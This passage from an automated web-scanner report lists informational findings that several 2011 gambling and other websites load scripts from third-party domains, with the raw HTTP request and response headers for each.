Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 338090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script><script language="javascript" src="http://downloadGames.c365download.com/fimversion.conf.php" type="text/javascript"></script>
...[SNIP]...

19.23. https://games.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://games.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: games.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:48 GMT
Connection: close
Content-Length: 161353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/games/en/df_GamesMasterJS_v10454.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.24. http://getclicky.com/66384109

Summary

Severity:   Information
Confidence:   Certain
Host:   http://getclicky.com
Path:   /66384109

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /66384109 HTTP/1.1
Host: getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:21 GMT
Server: Apache
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Set-Cookie: PHPSESSID=8adbf56b6cdc8626904763e06aeaa6ad; path=/
Cache-Control: must-revalidate, no-cache
Set-Cookie: referer=66372715; expires=Fri, 15 Jul 2011 12:45:21 GMT; path=/; domain=.getclicky.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46672

<!doctype html>
<html>
<head>
<title>Web Analytics in Real Time | Clicky</title>
<meta name="description" content="Clicky Web Analytics is simply the best way to monitor, analyze, and react to your bl
...[SNIP]...
<link href="http://static.getclicky.com/inc/style.css?2011-01-10" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://maps.google.com/maps/api/js?v=3.3&sensor=false"></script>
...[SNIP]...

19.25. http://it.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.26. http://itunes.apple.com/us/app/pclottery/id399201446

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/pclottery/id399201446

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/pclottery/id399201446 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 16 May 2011 12:13:11 GMT
x-apple-orig-url-path: /us/app/pclottery/id399201446
x-apple-application-site: ST11
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=399201446&cc=us
x-apple-application-instance: 2093012
x-apple-aka-ttl: Generated Mon May 16 05:13:11 PDT 2011, Expires Mon May 16 05:14:11 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=60
Date: Mon, 16 May 2011 12:13:11 GMT
Content-Length: 23420
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz"></script>
...[SNIP]...

19.27. http://jquery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 May 2011 14:06:28 GMT
ETag: "49602d6-41a4-cfd98100"
Accept-Ranges: bytes
Content-Length: 16804
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

19.28. http://leandrovieira.com/projects/jquery/lightbox/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leandrovieira.com
Path:   /projects/jquery/lightbox/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:41 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<!-- / container -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.29. https://livecasino.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://livecasino.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: livecasino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:10:21 GMT
Connection: close
Content-Length: 44358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->


<script src="https://ble.hs.llnwd.net/e1/livecasino/en/df_Master_js_4052_27715.js" type="text/javascript"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.30. http://mad4milk.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mad4milk.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:27 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220dab13bb74e8811bc287a4f680ca7c35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1305547348%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Mon, 16-May-2011 14:02:28 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />
   
   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

19.31. http://nl.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rdea0n55hhroqxblgqaveqye; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.32. http://nl.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=9jhkgdc329m3l6ckield5tnpl7; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123202; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540579; expires=Tue, 15-May-2012 12:24:16 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:18 GMT
Connection: close
Content-Length: 23134

<!DOCTYPE html>
<html dir="ltr" lang="nl-NL">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - De #1 bestemming voor PRET met online Winnings amusement! | Winnings.com</title>
<link rel=
...[SNIP]...
<link rel="pingback" href="http://nl.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.33. http://no.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2f3co55vtup5rji1vapqb55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.34. http://no.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=tg684evsvkmguaeu71dlpar7c5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123206; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540583; expires=Tue, 15-May-2012 12:24:21 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:22 GMT
Connection: close
Content-Length: 23083

<!DOCTYPE html>
<html dir="ltr" lang="no">
<head>
<meta charset="UTF-8" />

<title>Winnings.com – Det Beste Stedet for GØYAL Online Spilleunderholdning! | Winnings.com</title>
<link rel="alt
...[SNIP]...
<link rel="pingback" href="http://no.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.35. http://okscratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://okscratchcards.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:37:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12080


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...

19.36. http://poker.bet365.com/home/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://poker.bet365.com
Path:   /home/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nyfxkkm5jpltjay123ux5555; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script><script language="javascript" src="http://banner.bet365casino.com/fimversion.conf.php" type="text/javascript"></script>
...[SNIP]...

19.37. https://poker.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://poker.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:27 GMT
Connection: close
Content-Length: 39393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.38. http://pt.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.39. http://pt.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
